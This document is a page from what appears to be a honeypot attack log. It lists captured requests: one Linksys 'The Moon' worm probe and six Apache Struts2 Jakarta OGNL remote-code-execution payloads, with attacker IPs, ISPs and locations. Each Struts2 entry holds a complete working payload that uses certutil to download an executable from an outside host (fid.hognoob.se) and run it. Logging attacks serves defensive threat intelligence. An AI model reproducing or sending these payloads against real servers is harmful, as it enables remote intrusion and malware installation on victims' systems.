This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 9770 results (977 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 195.181.189.46
Dest. port: 8080
Time: 20/03/2019 16:35:48
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS44513 Optima Italia S.p.A.
Location: Campania, Naples (zipcode 80133)
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 107.210.125.117:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://107.210.125.117:8080/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.do HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.do Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:26
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /index.action HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/index.action Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 114.253.197.33
Dest. port: 8080
Time: 20/03/2019 14:58:25
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4808 China Unicom Beijing Province Network
Location: Beijing, Beijing
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1 accept-language: zh-cn Host: 107.210.125.117:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://107.210.125.117:8080/struts2-rest-showcase/orders.xhtml Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/sizwsblhnjsbwcr177.exe & cmd.exe /c C:/Windows/temp/sizwsblhnjsbwcr177.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:24
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.do HTTP/1.1 accept-language: zh-cn Host: 201.6.177.246:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://201.6.177.246:8080/index.do Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:23
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /index.action HTTP/1.1 accept-language: zh-cn Host: 201.6.177.246:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://201.6.177.246:8080/index.action Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 222.134.22.239
Dest. port: 8080
Time: 10/03/2019 05:22:21
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Shandong, Qingdao
GET /struts2-rest-showcase/orders.xhtml HTTP/1.1 accept-language: zh-cn Host: 201.6.177.246:8080 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) connection: Keep-Alive referer: http://201.6.177.246:8080/struts2-rest-showcase/orders.xhtml Content-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe C:/Windows/temp/rsknrjosxcmdgwz23121.exe & cmd.exe /c C:/Windows/temp/rsknrjosxcmdgwz23121.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}